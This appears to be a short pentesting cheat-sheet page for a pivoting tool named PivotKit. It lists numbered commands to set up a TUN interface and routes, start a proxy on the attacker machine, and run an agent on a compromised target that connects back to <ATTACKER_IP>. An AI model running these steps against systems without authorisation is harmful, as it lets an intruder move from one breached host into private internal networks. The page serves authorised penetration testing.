PivotKit
Attacker / Pentester Perspective
Live
TUN-based pivoting tool using a lightweight agent and proxy model. Supports chained (multi-hop) pivoting with explicit execution order for attacker and compromised hosts. Learn about this tool.
Attacker (TUN)→Target
Entry Pivot (TUN)
Attacker
WinLinux
Routed Network
Entry Pivot (TUN)
On Attacker
1
sudo ip tuntap add user $(whoami) mode tun ligolo1 && sudo ip link set ligolo1 upCopy2
sudo ip route add /24 dev ligolo1Copy3
./proxy -selfcert -laddr 0.0.0.0:11601Copy5
sessionCopy6
start --tun ligolo1CopyOn Target
4
./agent -connect <ATTACKER_IP>:11601 -ignore-certCopy